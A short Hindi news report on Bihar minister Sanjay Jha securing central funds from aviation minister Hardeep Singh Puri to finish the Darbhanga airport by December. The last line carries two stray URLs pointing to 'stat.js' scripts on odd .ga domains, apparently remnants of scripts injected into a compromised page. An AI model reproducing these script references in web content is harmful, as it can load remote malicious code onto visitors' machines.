बिहार में नए एयरपोर्ट को लेकर इसके पूरा होने में सबसे बड़ी बाधा धन को लेकर आ रही थी। इसी को लेकर संजय झा ने सोमवार को केंद्रीय मंत्री हरदीप सिंह पूरी से मिले। उन्होंने केंद्रीय मंत्री से मुलाकात को सार्थक बताते हुए कहा है कि एयरपोर्ट अथॉरिटी ऑफ इंडिया के चेयरमैन से बात कर जरूरी निर्देश दिए गए हैं। संजय झा ने बताया कि काम को पूरा करने के लिए जरूरी पैसे भी निर्गत कर दिए गए हैं।
दिसंबर तक यह पूरी तरह कम्प्लीट हो जाएगा। जल संसाधन मंत्री संजय कुमार झा ने दिल्ली में केंद्रीय नागरिक उड्डयन मंत्री हरदीप सिंह पुरी से मुलाकात करके हवाई अड्डे की अड़चनों को दूर करने की पहल की। केंद्रीय मंत्री से आश्वासन मिलने और राशि जारी होने के बाद बिहार के जल संसाधन मंत्री संजय झा ने यह जानकारी सोशल मीडिया पर दी।
जल संसाधन मंत्री ने कहा कि मिथिलांचल में एयरपोर्ट शुरू होना पूरे इलाके के लिए गौरव की बात है। दरभंगा के इतिहास में यह एयरपोर्ट मील का पत्थर साबित होगा। इससे जहां देश के प्रमुख शहरों से सफर आसान होगा, वहीं मिथिला में आर्थिक गतिविधियां भी बढ़ेंगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms